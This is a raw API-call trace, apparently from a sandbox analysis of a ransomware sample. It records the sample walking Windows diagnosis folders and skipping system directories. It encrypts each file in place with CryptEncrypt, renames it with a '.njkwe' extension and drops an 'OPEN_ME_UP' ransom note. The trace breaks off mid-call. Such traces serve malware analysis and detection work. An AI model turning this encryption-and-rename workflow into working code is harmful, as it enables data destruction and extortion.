cAlternateFileName="UTCAPP~1.BK")) returned 1 [0073.228] lstrcmpiW (lpString1="utc.app.json.bk", lpString2="Windows") returned -1 [0073.228] lstrcmpiW (lpString1="utc.app.json.bk", lpString2="$Recycle.bin") returned 1 [0073.228] lstrcmpiW (lpString1="utc.app.json.bk", lpString2="System Volume Information") returned 1 [0073.228] lstrcmpiW (lpString1="utc.app.json.bk", lpString2="Program Files") returned 1 [0073.228] lstrcmpiW (lpString1="utc.app.json.bk", lpString2="Program Files (x86)") returned 1 [0073.228] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json.bk") returned 73 [0073.228] StrStrIW (lpFirst="utc.app.json.bk", lpSrch=".njkwe") returned 0x0 [0073.228] lstrcmpW (lpString1="utc.app.json.bk", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.228] lstrcmpW (lpString1="utc.app.json.bk", lpString2="taridd") returned 1 [0073.229] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json.bk", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.229] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json.bk" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json.bk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0073.229] GetTickCount () returned 0x1152aa6 [0073.229] GetTickCount () returned 0x1152aa6 [0073.229] GetTickCount () returned 0x1152aa6 [0073.229] GetTickCount () returned 0x1152aa6 [0073.229] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0073.229] GetProcessHeap () returned 0xbe0000 [0073.229] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0073.229] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x67f, lpOverlapped=0x0) returned 1 [0073.232] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffff981, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.232] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x67f, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x67f, lpOverlapped=0x0) returned 1 [0073.232] GetProcessHeap () returned 0xbe0000 [0073.232] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0073.232] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.232] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0073.232] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0073.232] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0073.232] CloseHandle (hObject=0x434) returned 1 [0073.232] GetProcessHeap () returned 0xbe0000 [0073.232] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0073.232] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json.bk_r00t_{3sXlE5}.njkwe") returned 93 [0073.232] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json.bk" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json.bk"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json.bk_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json.bk_r00t_{3sxle5}.njkwe")) returned 1 [0073.233] GetProcessHeap () returned 0xbe0000 [0073.233] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0073.233] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7e8bf97d, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x7e8bf97d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x7ea85252, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x8e9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="utc.cert.json", cAlternateFileName="UTCCER~1.JSO")) returned 1 [0073.233] lstrcmpiW (lpString1="utc.cert.json", lpString2="Windows") returned -1 [0073.233] lstrcmpiW (lpString1="utc.cert.json", lpString2="$Recycle.bin") returned 1 [0073.233] lstrcmpiW (lpString1="utc.cert.json", lpString2="System Volume Information") returned 1 [0073.233] lstrcmpiW (lpString1="utc.cert.json", lpString2="Program Files") returned 1 [0073.233] lstrcmpiW (lpString1="utc.cert.json", lpString2="Program Files (x86)") returned 1 [0073.233] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.cert.json") returned 71 [0073.233] StrStrIW (lpFirst="utc.cert.json", lpSrch=".njkwe") returned 0x0 [0073.233] lstrcmpW (lpString1="utc.cert.json", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.233] lstrcmpW (lpString1="utc.cert.json", lpString2="taridd") returned 1 [0073.234] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.cert.json", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.234] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.cert.json" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedsettings\\utc.cert.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.234] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7e8bf97d, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x7e8bf97d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x7ea85252, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x8e9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="utc.cert.json", cAlternateFileName="UTCCER~1.JSO")) returned 0 [0073.234] FindClose (in: hFindFile=0xc1a1a0 | out: hFindFile=0xc1a1a0) returned 1 [0073.234] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 89 [0073.234] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedsettings\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0073.234] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0073.235] CloseHandle (hObject=0x430) returned 1 [0073.235] GetProcessHeap () returned 0xbe0000 [0073.235] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0073.235] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x8e23c06e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x8e23c06e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ETLLogs", cAlternateFileName="")) returned 1 [0073.235] lstrcmpiW (lpString1="ETLLogs", lpString2="Windows") returned -1 [0073.235] lstrcmpiW (lpString1="ETLLogs", lpString2="$Recycle.bin") returned 1 [0073.235] lstrcmpiW (lpString1="ETLLogs", lpString2="System Volume Information") returned -1 [0073.235] lstrcmpiW (lpString1="ETLLogs", lpString2="Program Files") returned -1 [0073.236] lstrcmpiW (lpString1="ETLLogs", lpString2="Program Files (x86)") returned -1 [0073.236] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs") returned 46 [0073.236] lstrcmpW (lpString1="ETLLogs", lpString2=".") returned 1 [0073.236] lstrcmpW (lpString1="ETLLogs", lpString2="..") returned 1 [0073.236] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.236] GetProcessHeap () returned 0xbe0000 [0073.236] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0073.236] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\*") returned 48 [0073.236] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x8e23c06e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x8e23c06e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a1e0 [0073.237] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.237] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.237] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.237] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.237] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.237] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\.") returned 48 [0073.237] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.237] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0073.237] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.237] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0073.237] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.237] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\." (normalized: "c:\\programdata\\microsoft\\diagnosis\\etllogs\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.237] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x8e23c06e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x8e23c06e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.238] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.238] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.238] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.238] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.238] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.238] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\..") returned 49 [0073.238] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.238] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.238] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0073.238] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.238] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0073.238] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.238] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\.." (normalized: "c:\\programdata\\microsoft\\diagnosis"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.238] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x2d5cadbc, ftLastAccessTime.dwHighDateTime=0x1d336e0, ftLastWriteTime.dwLowDateTime=0x2d5cadbc, ftLastWriteTime.dwHighDateTime=0x1d336e0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="AutoLogger", cAlternateFileName="AUTOLO~1")) returned 1 [0073.238] lstrcmpiW (lpString1="AutoLogger", lpString2="Windows") returned -1 [0073.238] lstrcmpiW (lpString1="AutoLogger", lpString2="$Recycle.bin") returned 1 [0073.238] lstrcmpiW (lpString1="AutoLogger", lpString2="System Volume Information") returned -1 [0073.238] lstrcmpiW (lpString1="AutoLogger", lpString2="Program Files") returned -1 [0073.238] lstrcmpiW (lpString1="AutoLogger", lpString2="Program Files (x86)") returned -1 [0073.238] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger") returned 57 [0073.238] lstrcmpW (lpString1="AutoLogger", lpString2=".") returned 1 [0073.238] lstrcmpW (lpString1="AutoLogger", lpString2="..") returned 1 [0073.238] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.238] GetProcessHeap () returned 0xbe0000 [0073.238] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0073.238] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\*") returned 59 [0073.238] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x2d5cadbc, ftLastAccessTime.dwHighDateTime=0x1d336e0, ftLastWriteTime.dwLowDateTime=0xcd8d859b, ftLastWriteTime.dwHighDateTime=0x1d34734, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a260 [0073.238] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.239] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.239] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.239] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.239] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.239] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\.") returned 59 [0073.239] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.239] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0073.239] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.239] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0073.239] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.239] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\." (normalized: "c:\\programdata\\microsoft\\diagnosis\\etllogs\\autologger\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.239] FindNextFileW (in: hFindFile=0xc1a260, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x2d5cadbc, ftLastAccessTime.dwHighDateTime=0x1d336e0, ftLastWriteTime.dwLowDateTime=0xcd8d859b, ftLastWriteTime.dwHighDateTime=0x1d34734, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.239] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.239] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.239] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.239] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.239] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.239] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\..") returned 60 [0073.239] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.239] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.239] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0073.239] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.239] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0073.239] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.239] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\.." (normalized: "c:\\programdata\\microsoft\\diagnosis\\etllogs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.239] FindNextFileW (in: hFindFile=0xc1a260, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcd8d859b, ftCreationTime.dwHighDateTime=0x1d34734, ftLastAccessTime.dwLowDateTime=0xcd8d859b, ftLastAccessTime.dwHighDateTime=0x1d34734, ftLastWriteTime.dwLowDateTime=0xac487de2, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0x30000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="AutoLogger-Diagtrack-Listener.etl", cAlternateFileName="AUTOLO~1.ETL")) returned 1 [0073.239] lstrcmpiW (lpString1="AutoLogger-Diagtrack-Listener.etl", lpString2="Windows") returned -1 [0073.239] lstrcmpiW (lpString1="AutoLogger-Diagtrack-Listener.etl", lpString2="$Recycle.bin") returned 1 [0073.239] lstrcmpiW (lpString1="AutoLogger-Diagtrack-Listener.etl", lpString2="System Volume Information") returned -1 [0073.239] lstrcmpiW (lpString1="AutoLogger-Diagtrack-Listener.etl", lpString2="Program Files") returned -1 [0073.239] lstrcmpiW (lpString1="AutoLogger-Diagtrack-Listener.etl", lpString2="Program Files (x86)") returned -1 [0073.240] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\AutoLogger-Diagtrack-Listener.etl") returned 91 [0073.240] StrStrIW (lpFirst="AutoLogger-Diagtrack-Listener.etl", lpSrch=".njkwe") returned 0x0 [0073.240] lstrcmpW (lpString1="AutoLogger-Diagtrack-Listener.etl", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.240] lstrcmpW (lpString1="AutoLogger-Diagtrack-Listener.etl", lpString2="taridd") returned -1 [0073.240] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\AutoLogger-Diagtrack-Listener.etl", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.240] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\AutoLogger-Diagtrack-Listener.etl" (normalized: "c:\\programdata\\microsoft\\diagnosis\\etllogs\\autologger\\autologger-diagtrack-listener.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0073.240] GetTickCount () returned 0x1152ab6 [0073.240] GetTickCount () returned 0x1152ab6 [0073.240] GetTickCount () returned 0x1152ab6 [0073.240] GetTickCount () returned 0x1152ab6 [0073.240] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0073.240] GetProcessHeap () returned 0xbe0000 [0073.240] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4e850 [0073.240] ReadFile (in: hFile=0x438, lpBuffer=0xc4e850, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc4e850*, lpNumberOfBytesRead=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0073.242] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.242] WriteFile (in: hFile=0x438, lpBuffer=0xc4e850*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc4e850*, lpNumberOfBytesWritten=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0073.242] GetProcessHeap () returned 0xbe0000 [0073.242] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4e850 | out: hHeap=0xbe0000) returned 1 [0073.242] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.243] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0073.243] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0073.243] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0073.243] CloseHandle (hObject=0x438) returned 1 [0073.243] GetProcessHeap () returned 0xbe0000 [0073.243] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0073.243] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\AutoLogger-Diagtrack-Listener.etl_r00t_{3sXlE5}.njkwe") returned 111 [0073.243] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\AutoLogger-Diagtrack-Listener.etl" (normalized: "c:\\programdata\\microsoft\\diagnosis\\etllogs\\autologger\\autologger-diagtrack-listener.etl"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\AutoLogger-Diagtrack-Listener.etl_r00t_{3sXlE5}.njkwe" (normalized: 